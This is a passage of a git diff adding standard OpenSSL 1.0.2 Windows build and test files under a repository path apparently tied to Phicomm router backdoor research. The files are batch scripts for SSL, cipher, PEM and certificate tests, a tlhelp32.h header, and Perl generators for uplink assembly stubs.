+cerun CE:\OpenSSL\ssltest -bio_pair -ssl3 -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv3 with both client and server authentication via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -ssl3 -server_auth -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 via BIO pair
+cerun CE:\OpenSSL\ssltest
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with server authentication
+cerun CE:\OpenSSL\ssltest -bio_pair -server_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with client authentication via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+echo test sslv2/sslv3 with both client and server authentication via BIO pair
+cerun CE:\OpenSSL\ssltest -bio_pair -server_auth -client_auth -CAfile \OpenSSL\cert.tmp
+if errorlevel 1 goto done
+
+del cert.tmp
+
+echo passed all tests
+goto end
+:done
+echo problems.....
+:end
+PATH=%opath%
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testce2.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testce2.bat
new file mode 100644
index 0000000..24265b9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testce2.bat
@@ -0,0 +1,2 @@
+cecopy %1.exe CE:\OpenSSL
+cerun CE:\OpenSSL\%1 %2 %3 %4 %5 %6 %7 %8 %9
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testenc.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testenc.bat
new file mode 100755
index 0000000..f8e9093
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testenc.bat
@@ -0,0 +1,94 @@
+@echo off
+echo start testenc
+
+path=..\ms;%path%
+set ssleay=%1%
+set input=..\ms\testenc.bat
+set tmp1=..\ms\cipher.out
+set out1=..\ms\clear.out
+set cmp=perl ..\ms\cmp.pl
+
+cd
+call tenc.bat enc
+if errorlevel 1 goto err
+
+call tenc.bat rc4
+if errorlevel 1 goto err
+
+call tenc.bat des-cfb
+if errorlevel 1 goto err
+
+call tenc.bat des-ede-cfb
+if errorlevel 1 goto err
+
+call tenc.bat des-ede3-cfb
+if errorlevel 1 goto err
+
+call tenc.bat des-ofb
+if errorlevel 1 goto err
+
+call tenc.bat des-ede-ofb
+if errorlevel 1 goto err
+
+call tenc.bat des-ede3-ofb
+if errorlevel 1 goto err
+
+call tenc.bat des-ecb
+if errorlevel 1 goto err
+
+call tenc.bat des-ede
+if errorlevel 1 goto err
+
+call tenc.bat des-ede3
+if errorlevel 1 goto err
+
+call tenc.bat des-cbc
+if errorlevel 1 goto err
+
+call tenc.bat des-ede-cbc
+if errorlevel 1 goto err
+
+call tenc.bat des-ede3-cbc
+if errorlevel 1 goto err
+
+call tenc.bat idea-ecb
+if errorlevel 1 goto err
+
+call tenc.bat idea-cfb
+if errorlevel 1 goto err
+
+call tenc.bat idea-ofb
+if errorlevel 1 goto err
+
+call tenc.bat idea-cbc
+if errorlevel 1 goto err
+
+call tenc.bat rc2-ecb
+if errorlevel 1 goto err
+
+call tenc.bat rc2-cfb
+if errorlevel 1 goto err
+
+call tenc.bat rc2-ofb
+if errorlevel 1 goto err
+
+call tenc.bat rc2-cbc
+if errorlevel 1 goto err
+
+call tenc.bat bf-ecb
+if errorlevel 1 goto err
+
+call tenc.bat bf-cfb
+if errorlevel 1 goto err
+
+call tenc.bat bf-ofb
+if errorlevel 1 goto err
+
+call tenc.bat bf-cbc
+if errorlevel 1 goto err
+
+echo OK
+del %out1%
+del %tmp1%
+:err
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testencce.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testencce.bat
new file mode 100644
index 0000000..1da3e08
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testencce.bat
@@ -0,0 +1,97 @@
+@echo off
+echo start testenc
+
+path=..\ms;%path%
+set ssleay=%1%
+copy ..\ms\testenc.bat >nul
+set input=testenc.bat
+set tmp1=cipher.out
+set out1=clear.out
+set cmp=perl ..\ms\cmp.pl
+
+cecopy %ssleay% CE:\OpenSSL
+
+cd
+call tencce.bat enc
+if errorlevel 1 goto err
+
+call tencce.bat rc4
+if errorlevel 1 goto err
+
+call tencce.bat des-cfb
+if errorlevel 1 goto err
+
+call tencce.bat des-ede-cfb
+if errorlevel 1 goto err
+
+call tencce.bat des-ede3-cfb
+if errorlevel 1 goto err
+
+call tencce.bat des-ofb
+if errorlevel 1 goto err
+
+call tencce.bat des-ede-ofb
+if errorlevel 1 goto err
+
+call tencce.bat des-ede3-ofb
+if errorlevel 1 goto err
+
+call tencce.bat des-ecb
+if errorlevel 1 goto err
+
+call tencce.bat des-ede
+if errorlevel 1 goto err
+
+call tencce.bat des-ede3
+if errorlevel 1 goto err
+
+call tencce.bat des-cbc
+if errorlevel 1 goto err
+
+call tencce.bat des-ede-cbc
+if errorlevel 1 goto err
+
+call tencce.bat des-ede3-cbc
+if errorlevel 1 goto err
+
+call tencce.bat idea-ecb
+if errorlevel 1 goto err
+
+call tencce.bat idea-cfb
+if errorlevel 1 goto err
+
+call tencce.bat idea-ofb
+if errorlevel 1 goto err
+
+call tencce.bat idea-cbc
+if errorlevel 1 goto err
+
+call tencce.bat rc2-ecb
+if errorlevel 1 goto err
+
+call tencce.bat rc2-cfb
+if errorlevel 1 goto err
+
+call tencce.bat rc2-ofb
+if errorlevel 1 goto err
+
+call tencce.bat rc2-cbc
+if errorlevel 1 goto err
+
+call tencce.bat bf-ecb
+if errorlevel 1 goto err
+
+call tencce.bat bf-cfb
+if errorlevel 1 goto err
+
+call tencce.bat bf-ofb
+if errorlevel 1 goto err
+
+call tencce.bat bf-cbc
+if errorlevel 1 goto err
+
+echo OK
+del %out1% >nul 2>&1
+del %tmp1% >nul 2>&1
+:err
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testpem.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testpem.bat
new file mode 100755
index 0000000..8b2e844
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testpem.bat
@@ -0,0 +1,32 @@
+@echo off
+set ssleay=%1%
+set tmp1=pem.out
+set cmp=fc.exe
+
+call tpem.bat crl ..\test\testcrl.pem
+if errorlevel 1 goto err
+
+call tpem.bat pkcs7 ..\test\testp7.pem
+if errorlevel 1 goto err
+
+call tpem.bat req ..\test\testreq2.pem
+if errorlevel 1 goto err
+
+call tpem.bat rsa ..\test\testrsa.pem
+if errorlevel 1 goto err
+
+call tpem.bat x509 ..\test\testx509.pem
+if errorlevel 1 goto err
+
+call tpem.bat x509 ..\test\v3-cert1.pem
+if errorlevel 1 goto err
+
+call tpem.bat x509 ..\test\v3-cert1.pem
+if errorlevel 1 goto err
+
+call tpem.bat sess_id ..\test\testsid.pem
+if errorlevel 1 goto err
+
+echo OK
+del %tmp1%
+:err
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testpemce.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testpemce.bat
new file mode 100644
index 0000000..ac64a79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testpemce.bat
@@ -0,0 +1,42 @@
+@echo off
+set ssleay=%1%
+set tmp1=pem.out
+set cmp=fc.exe
+
+cecopy %ssleay% CE:\OpenSSL
+
+copy ..\test\testcrl.pem >nul
+call tpemce.bat crl testcrl.pem
+if errorlevel 1 goto err
+
+copy ..\test\testp7.pem >nul
+call tpemce.bat pkcs7 testp7.pem
+if errorlevel 1 goto err
+
+copy ..\test\testreq2.pem >nul
+call tpemce.bat req testreq2.pem
+if errorlevel 1 goto err
+
+copy ..\test\testrsa.pem >nul
+call tpemce.bat rsa testrsa.pem
+if errorlevel 1 goto err
+
+copy ..\test\testx509.pem >nul
+call tpemce.bat x509 testx509.pem
+if errorlevel 1 goto err
+
+copy ..\test\v3-cert1.pem >nul
+call tpemce.bat x509 v3-cert1.pem
+if errorlevel 1 goto err
+
+copy ..\test\v3-cert1.pem >nul
+call tpemce.bat x509 v3-cert1.pem
+if errorlevel 1 goto err
+
+copy ..\test\testsid.pem >nul
+call tpemce.bat sess_id testsid.pem
+if errorlevel 1 goto err
+
+echo OK
+del %tmp1% >nul 2>&1
+:err
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testss.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testss.bat
new file mode 100755
index 0000000..5afa131
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testss.bat
@@ -0,0 +1,98 @@
+@echo off
+
+rem set ssleay=..\out\ssleay
+set ssleay=%1
+
+set reqcmd=%ssleay% req
+set x509cmd=%ssleay% x509 -sha1
+set verifycmd=%ssleay% verify
+
+set CAkey=keyCA.ss
+set CAcert=certCA.ss
+set CAserial=certCA.srl
+set CAreq=reqCA.ss
+set CAconf=..\test\CAss.cnf
+set CAreq2=req2CA.ss	
+
+set Uconf=..\test\Uss.cnf
+set Ukey=keyU.ss
+set Ureq=reqU.ss
+set Ucert=certU.ss
+
+echo make a certificate request using 'req'
+%reqcmd% -config %CAconf% -out %CAreq% -keyout %CAkey% -new
+if errorlevel 1 goto e_req
+
+echo convert the certificate request into a self signed certificate using 'x509'
+%x509cmd% -CAcreateserial -in %CAreq% -days 30 -req -out %CAcert% -signkey %CAkey% >err.ss
+if errorlevel 1 goto e_x509
+
+echo --
+echo convert a certificate into a certificate request using 'x509'
+%x509cmd% -in %CAcert% -x509toreq -signkey %CAkey% -out %CAreq2% >err.ss
+if errorlevel 1 goto e_x509_2
+
+%reqcmd% -verify -in %CAreq% -noout
+if errorlevel 1 goto e_vrfy_1
+
+%reqcmd% -verify -in %CAreq2% -noout
+if errorlevel 1 goto e_vrfy_2
+
+%verifycmd% -CAfile %CAcert% %CAcert%
+if errorlevel 1 goto e_vrfy_3
+
+echo --
+echo make another certificate request using 'req'
+%reqcmd% -config %Uconf% -out %Ureq% -keyout %Ukey% -new >err.ss
+if errorlevel 1 goto e_req_gen
+
+echo --
+echo sign certificate request with the just created CA via 'x509'
+%x509cmd% -CAcreateserial -in %Ureq% -days 30 -req -out %Ucert% -CA %CAcert% -CAkey %CAkey% -CAserial %CAserial%
+if errorlevel 1 goto e_x_sign
+
+%verifycmd% -CAfile %CAcert% %Ucert%
+echo --
+echo Certificate details
+%x509cmd% -subject -issuer -startdate -enddate -noout -in %Ucert%
+
+echo Everything appeared to work
+echo --
+echo The generated CA certificate is %CAcert%
+echo The generated CA private key is %CAkey%
+echo The current CA signing serial number is in %CAserial%
+
+echo The generated user certificate is %Ucert%
+echo The generated user private key is %Ukey%
+echo --
+
+del err.ss
+
+goto end
+
+:e_req
+echo error using 'req' to generate a certificate request
+goto end
+:e_x509
+echo error using 'x509' to self sign a certificate request
+goto end
+:e_x509_2
+echo error using 'x509' convert a certificate to a certificate request
+goto end
+:e_vrfy_1
+echo first generated request is invalid
+goto end
+:e_vrfy_2
+echo second generated request is invalid
+goto end
+:e_vrfy_3
+echo first generated cert is invalid
+goto end
+:e_req_gen
+echo error using 'req' to generate a certificate request
+goto end
+:e_x_sign
+echo error using 'x509' to sign a certificate request
+goto end
+
+:end
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testssce.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testssce.bat
new file mode 100644
index 0000000..18381ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/testssce.bat
@@ -0,0 +1,104 @@
+rem set ssleay=..\out\ssleay
+set ssleay=%1
+
+set reqcmd=%ssleay% req
+set x509cmd=%ssleay% x509
+set verifycmd=%ssleay% verify
+
+set CAkey=\OpenSSL\keyCA.ss
+set CAcert=\OpenSSL\certCA.ss
+set CAserial=\OpenSSL\certCA.srl
+set CAreq=\OpenSSL\reqCA.ss
+cecopy ..\test\CAss.cnf CE:\OpenSSL
+set CAconf=\OpenSSL\CAss.cnf
+set CAreq2=\OpenSSL\req2CA.ss	
+
+cecopy ..\test\Uss.cnf CE:\OpenSSL
+set Uconf=\OpenSSL\Uss.cnf
+set Ukey=\OpenSSL\keyU.ss
+set Ureq=\OpenSSL\reqU.ss
+set Ucert=\OpenSSL\certU.ss
+
+echo make a certificate request using 'req'
+cerun CE:\OpenSSL\%reqcmd% -config %CAconf% -out %CAreq% -keyout %CAkey% -new
+if errorlevel 1 goto e_req
+
+echo convert the certificate request into a self signed certificate using 'x509'
+cerun CE:\OpenSSL\%x509cmd% -CAcreateserial -in %CAreq% -days 30 -req -out %CAcert% -signkey %CAkey% "> \OpenSSL\err.ss"
+if errorlevel 1 goto e_x509
+
+echo --
+echo convert a certificate into a certificate request using 'x509'
+cerun CE:\OpenSSL\%x509cmd% -in %CAcert% -x509toreq -signkey %CAkey% -out %CAreq2% "> \OpenSSL\err.ss"
+if errorlevel 1 goto e_x509_2
+
+cerun CE:\OpenSSL\%reqcmd% -verify -in %CAreq% -noout
+if errorlevel 1 goto e_vrfy_1
+
+cerun CE:\OpenSSL\%reqcmd% -verify -in %CAreq2% -noout
+if errorlevel 1 goto e_vrfy_2
+
+cerun CE:\OpenSSL\%verifycmd% -CAfile %CAcert% %CAcert%
+if errorlevel 1 goto e_vrfy_3
+
+echo --
+echo make another certificate request using 'req'
+cerun CE:\OpenSSL\%reqcmd% -config %Uconf% -out %Ureq% -keyout %Ukey% -new "> \OpenSSL\err.ss"
+if errorlevel 1 goto e_req_gen
+
+echo --
+echo sign certificate request with the just created CA via 'x509'
+cerun CE:\OpenSSL\%x509cmd% -CAcreateserial -in %Ureq% -days 30 -req -out %Ucert% -CA %CAcert% -CAkey %CAkey% -CAserial %CAserial%
+if errorlevel 1 goto e_x_sign
+
+cerun CE:\OpenSSL\%verifycmd% -CAfile %CAcert% %Ucert%
+echo --
+echo Certificate details
+cerun CE:\OpenSSL\%x509cmd% -subject -issuer -startdate -enddate -noout -in %Ucert%
+
+cecopy CE:%CAcert% .
+cecopy CE:%CAkey% .
+cecopy CE:%CAserial% .
+cecopy CE:%Ucert% .
+cecopy CE:%Ukey% .
+
+echo Everything appeared to work
+echo --
+echo The generated CA certificate is %CAcert%
+echo The generated CA private key is %CAkey%
+echo The current CA signing serial number is in %CAserial%
+
+echo The generated user certificate is %Ucert%
+echo The generated user private key is %Ukey%
+echo --
+
+cedel CE:\OpenSSL\err.ss
+
+goto end
+
+:e_req
+echo error using 'req' to generate a certificate request
+goto end
+:e_x509
+echo error using 'x509' to self sign a certificate request
+goto end
+:e_x509_2
+echo error using 'x509' convert a certificate to a certificate request
+goto end
+:e_vrfy_1
+echo first generated request is invalid
+goto end
+:e_vrfy_2
+echo second generated request is invalid
+goto end
+:e_vrfy_3
+echo first generated cert is invalid
+goto end
+:e_req_gen
+echo error using 'req' to generate a certificate request
+goto end
+:e_x_sign
+echo error using 'x509' to sign a certificate request
+goto end
+
+:end
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tlhelp32.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tlhelp32.h
new file mode 100644
index 0000000..9408dc3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tlhelp32.h
@@ -0,0 +1,136 @@
+/*-
+        tlhelp32.h - Include file for Tool help functions.
+
+        Written by Mumit Khan <khan@nanotech.wisc.edu>
+
+        This file is part of a free library for the Win32 API.
+
+        This library is distributed in the hope that it will be useful,
+        but WITHOUT ANY WARRANTY; without even the implied warranty of
+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+
+*/
+#ifndef _TLHELP32_H
+# define _TLHELP32_H
+#ifdef __cplusplus
+extern "C" {
+#endif
+# define HF32_DEFAULT    1
+# define HF32_SHARED     2
+# define LF32_FIXED      0x1
+# define LF32_FREE       0x2
+# define LF32_MOVEABLE   0x4
+# define MAX_MODULE_NAME32       255
+# define TH32CS_SNAPHEAPLIST     0x1
+# define TH32CS_SNAPPROCESS      0x2
+# define TH32CS_SNAPTHREAD       0x4
+# define TH32CS_SNAPMODULE       0x8
+# define TH32CS_SNAPALL  (TH32CS_SNAPHEAPLIST|TH32CS_SNAPPROCESS|TH32CS_SNAPTHREAD|TH32CS_SNAPMODULE)
+# define TH32CS_INHERIT  0x80000000
+typedef struct tagHEAPLIST32 {
+    DWORD dwSize;
+    DWORD th32ProcessID;
+    DWORD th32HeapID;
+    DWORD dwFlags;
+} HEAPLIST32, *PHEAPLIST32, *LPHEAPLIST32;
+typedef struct tagHEAPENTRY32 {
+    DWORD dwSize;
+    HANDLE hHandle;
+    DWORD dwAddress;
+    DWORD dwBlockSize;
+    DWORD dwFlags;
+    DWORD dwLockCount;
+    DWORD dwResvd;
+    DWORD th32ProcessID;
+    DWORD th32HeapID;
+} HEAPENTRY32, *PHEAPENTRY32, *LPHEAPENTRY32;
+typedef struct tagPROCESSENTRY32W {
+    DWORD dwSize;
+    DWORD cntUsage;
+    DWORD th32ProcessID;
+    DWORD th32DefaultHeapID;
+    DWORD th32ModuleID;
+    DWORD cntThreads;
+    DWORD th32ParentProcessID;
+    LONG pcPriClassBase;
+    DWORD dwFlags;
+    WCHAR szExeFile[MAX_PATH];
+} PROCESSENTRY32W, *PPROCESSENTRY32W, *LPPROCESSENTRY32W;
+typedef struct tagPROCESSENTRY32 {
+    DWORD dwSize;
+    DWORD cntUsage;
+    DWORD th32ProcessID;
+    DWORD th32DefaultHeapID;
+    DWORD th32ModuleID;
+    DWORD cntThreads;
+    DWORD th32ParentProcessID;
+    LONG pcPriClassBase;
+    DWORD dwFlags;
+    CHAR szExeFile[MAX_PATH];
+} PROCESSENTRY32, *PPROCESSENTRY32, *LPPROCESSENTRY32;
+typedef struct tagTHREADENTRY32 {
+    DWORD dwSize;
+    DWORD cntUsage;
+    DWORD th32ThreadID;
+    DWORD th32OwnerProcessID;
+    LONG tpBasePri;
+    LONG tpDeltaPri;
+    DWORD dwFlags;
+} THREADENTRY32, *PTHREADENTRY32, *LPTHREADENTRY32;
+typedef struct tagMODULEENTRY32W {
+    DWORD dwSize;
+    DWORD th32ModuleID;
+    DWORD th32ProcessID;
+    DWORD GlblcntUsage;
+    DWORD ProccntUsage;
+    BYTE *modBaseAddr;
+    DWORD modBaseSize;
+    HMODULE hModule;
+    WCHAR szModule[MAX_MODULE_NAME32 + 1];
+    WCHAR szExePath[MAX_PATH];
+} MODULEENTRY32W, *PMODULEENTRY32W, *LPMODULEENTRY32W;
+typedef struct tagMODULEENTRY32 {
+    DWORD dwSize;
+    DWORD th32ModuleID;
+    DWORD th32ProcessID;
+    DWORD GlblcntUsage;
+    DWORD ProccntUsage;
+    BYTE *modBaseAddr;
+    DWORD modBaseSize;
+    HMODULE hModule;
+    char szModule[MAX_MODULE_NAME32 + 1];
+    char szExePath[MAX_PATH];
+} MODULEENTRY32, *PMODULEENTRY32, *LPMODULEENTRY32;
+BOOL WINAPI Heap32First(LPHEAPENTRY32, DWORD, DWORD);
+BOOL WINAPI Heap32ListFirst(HANDLE, LPHEAPLIST32);
+BOOL WINAPI Heap32ListNext(HANDLE, LPHEAPLIST32);
+BOOL WINAPI Heap32Next(LPHEAPENTRY32);
+BOOL WINAPI Module32First(HANDLE, LPMODULEENTRY32);
+BOOL WINAPI Module32FirstW(HANDLE, LPMODULEENTRY32W);
+BOOL WINAPI Module32Next(HANDLE, LPMODULEENTRY32);
+BOOL WINAPI Module32NextW(HANDLE, LPMODULEENTRY32W);
+BOOL WINAPI Process32First(HANDLE, LPPROCESSENTRY32);
+BOOL WINAPI Process32FirstW(HANDLE, LPPROCESSENTRY32W);
+BOOL WINAPI Process32Next(HANDLE, LPPROCESSENTRY32);
+BOOL WINAPI Process32NextW(HANDLE, LPPROCESSENTRY32W);
+BOOL WINAPI Thread32First(HANDLE, LPTHREADENTRY32);
+BOOL WINAPI Thread32Next(HANDLE, LPTHREADENTRY32);
+BOOL WINAPI Toolhelp32ReadProcessMemory(DWORD, LPCVOID, LPVOID, DWORD,
+                                        LPDWORD);
+HANDLE WINAPI CreateToolhelp32Snapshot(DWORD, DWORD);
+# ifdef UNICODE
+#  define LPMODULEENTRY32 LPMODULEENTRY32W
+#  define LPPROCESSENTRY32 LPPROCESSENTRY32W
+#  define MODULEENTRY32 MODULEENTRY32W
+#  define Module32First Module32FirstW
+#  define Module32Next Module32NextW
+#  define PMODULEENTRY32 PMODULEENTRY32W
+#  define PPROCESSENTRY32 PPROCESSENTRY32W
+#  define PROCESSENTRY32 PROCESSENTRY32W
+#  define Process32First Process32FirstW
+#  define Process32Next Process32NextW
+# endif                         /* UNICODE */
+#ifdef __cplusplus
+}
+#endif
+#endif                          /* _TLHELP32_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tpem.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tpem.bat
new file mode 100755
index 0000000..cd01792
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tpem.bat
@@ -0,0 +1,6 @@
+rem called by testpem
+
+echo test %1 %2
+%ssleay% %1 -in %2 -out %tmp1%
+%cmp% %2 %tmp1%
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tpemce.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tpemce.bat
new file mode 100644
index 0000000..483f559
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/tpemce.bat
@@ -0,0 +1,8 @@
+rem called by testpemce
+
+echo test %1 %2
+cecopy %2 CE:\OpenSSL
+cerun CE:\OpenSSL\%ssleay% %1 -in \OpenSSL\%2 -out \OpenSSL\%tmp1%
+del %tmp1% >nul 2>&1
+cecopy CE:\OpenSSL\%tmp1% .
+%cmp% %2 %tmp1%
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-common.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-common.pl
new file mode 100755
index 0000000..1d20e6e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-common.pl
@@ -0,0 +1,22 @@
+#!/usr/bin/env perl
+#
+# pull APPLINK_MAX value from applink.c...
+$applink_c=$0;
+$applink_c=~s|[^/\\]+$||g;
+$applink_c.="applink.c";
+open(INPUT,$applink_c) || die "can't open $applink_c: $!";
+@max=grep {/APPLINK_MAX\s+(\d+)/} <INPUT>;
+close(INPUT);
+($#max==0) or die "can't find APPLINK_MAX in $applink_c";
+
+$max[0]=~/APPLINK_MAX\s+(\d+)/;
+$N=$1;	# number of entries in OPENSSL_UplinkTable not including
+	# OPENSSL_UplinkTable[0], which contains this value...
+
+1;
+
+# Idea is to fill the OPENSSL_UplinkTable with pointers to stubs
+# which invoke 'void OPENSSL_Uplink (ULONG_PTR *table,int index)';
+# and then dereference themselves. Latter shall result in endless
+# loop *unless* OPENSSL_Uplink does not replace 'table[index]' with
+# something else, e.g. as 'table[index]=unimplemented;'...
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-ia64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-ia64.pl
new file mode 100755
index 0000000..4204c73
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-ia64.pl
@@ -0,0 +1,50 @@
+#!/usr/bin/env perl
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}.");
+
+require "uplink-common.pl";
+
+local $V=8;	# max number of args uplink functions may accept...
+my $loc0 = "r".(32+$V);
+print <<___;
+.text
+.global	OPENSSL_Uplink#
+.type	OPENSSL_Uplink#,\@function
+
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+.proc	lazy$i#
+lazy$i:
+	.prologue
+{ .mii;	.save	ar.pfs,$loc0
+	alloc	loc0=ar.pfs,$V,3,2,0
+	.save	b0,loc1
+	mov	loc1=b0
+	addl	loc2=\@ltoff(OPENSSL_UplinkTable#),gp	};;
+	.body
+{ .mmi;	ld8	out0=[loc2]
+	mov	out1=$i					};;
+{ .mib;	add	loc2=8*$i,out0
+	br.call.sptk.many	b0=OPENSSL_Uplink#	};;
+{ .mmi;	ld8	r31=[loc2];;
+	ld8	r30=[r31],8				};;
+{ .mii;	ld8	gp=[r31]
+	mov	b6=r30
+	mov	b0=loc1					};;
+{ .mib;	mov	ar.pfs=loc0
+	br.many	b6					};;
+.endp	lazy$i#
+
+___
+}
+print <<___;
+.data
+.global OPENSSL_UplinkTable#
+OPENSSL_UplinkTable:    data8   $N      // amount of following entries
+___
+for ($i=1;$i<=$N;$i++) {   print "      data8   \@fptr(lazy$i#)\n";   }
+print <<___;
+.size   OPENSSL_UplinkTable,.-OPENSSL_UplinkTable#
+___
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-x86.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-x86.pl
new file mode 100755
index 0000000..0dffc14
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-x86.pl
@@ -0,0 +1,33 @@
+#!/usr/bin/env perl
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC, "${dir}.", "${dir}../crypto/perlasm");
+require "x86asm.pl";
+
+require "uplink-common.pl";
+
+&asm_init($ARGV[0],"uplink-x86");
+
+&external_label("OPENSSL_Uplink");
+&public_label("OPENSSL_UplinkTable");
+
+for ($i=1;$i<=$N;$i++) {
+&function_begin_B("_\$lazy${i}");
+	&lea	("eax",&DWP(&label("OPENSSL_UplinkTable")));
+	&push	("eax");
+	&push	($i);
+	&call	(&label("OPENSSL_Uplink"));
+	&add	("esp",8);
+	&pop	("eax");
+	&jmp_ptr(&DWP(4*$i,"eax"));
+&function_end_B("_\$lazy${i}");
+}
+
+&dataseg();
+&align(4);
+&set_label("OPENSSL_UplinkTable");
+&data_word($N);
+for ($i=1;$i<=$N;$i++) {
+&data_word(&label("_\$lazy${i}"));
+}
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-x86_64.pl
new file mode 100755
index 0000000..48bf559
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink-x86_64.pl
@@ -0,0 +1,65 @@
+#!/usr/bin/env perl
+
+$output=shift;
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+open OUT,"| \"$^X\" ${dir}../crypto/perlasm/x86_64-xlate.pl $output";
+*STDOUT=*OUT;
+push(@INC,"${dir}.");
+
+require "uplink-common.pl";
+
+$prefix="_lazy";
+
+print <<___;
+.text
+.extern	OPENSSL_Uplink
+.globl	OPENSSL_UplinkTable
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+.type	$prefix${i},\@abi-omnipotent
+.align	16
+$prefix${i}:
+	.byte	0x48,0x83,0xEC,0x28	# sub rsp,40
+	mov	%rcx,48(%rsp)
+	mov	%rdx,56(%rsp)
+	mov	%r8,64(%rsp)
+	mov	%r9,72(%rsp)
+	lea	OPENSSL_UplinkTable(%rip),%rcx
+	mov	\$$i,%rdx
+	call	OPENSSL_Uplink
+	mov	48(%rsp),%rcx
+	mov	56(%rsp),%rdx
+	mov	64(%rsp),%r8
+	mov	72(%rsp),%r9
+	lea	OPENSSL_UplinkTable(%rip),%rax
+	add	\$40,%rsp
+	jmp	*8*$i(%rax)
+$prefix${i}_end:
+.size	$prefix${i},.-$prefix${i}
+___
+}
+print <<___;
+.data
+OPENSSL_UplinkTable:
+        .quad   $N
+___
+for ($i=1;$i<=$N;$i++) {   print "      .quad   $prefix$i\n";   }
+print <<___;
+.section	.pdata,"r"
+.align		4
+___
+for ($i=1;$i<=$N;$i++) {
+print <<___;
+	.rva	$prefix${i},$prefix${i}_end,${prefix}_unwind_info
+___
+}
+print <<___;
+.section	.xdata,"r"
+.align		8
+${prefix}_unwind_info:
+	.byte	0x01,0x04,0x01,0x00
+	.byte	0x04,0x42,0x00,0x00
+___
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.c
new file mode 100644
index 0000000..e58ab9d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ms/uplink.c
@@ -0,0 +1,126 @@
+#if (defined(_WIN64) || defined(_WIN32_WCE)) && !defined(UNICODE)
+# define UNICODE
+#endif
+#if defined(UNICODE) && !defined(_UNICODE)
+# define _UNICODE
+#endif
+#if defined(_UNICODE) && !defined(UNICODE)
+# define UNICODE
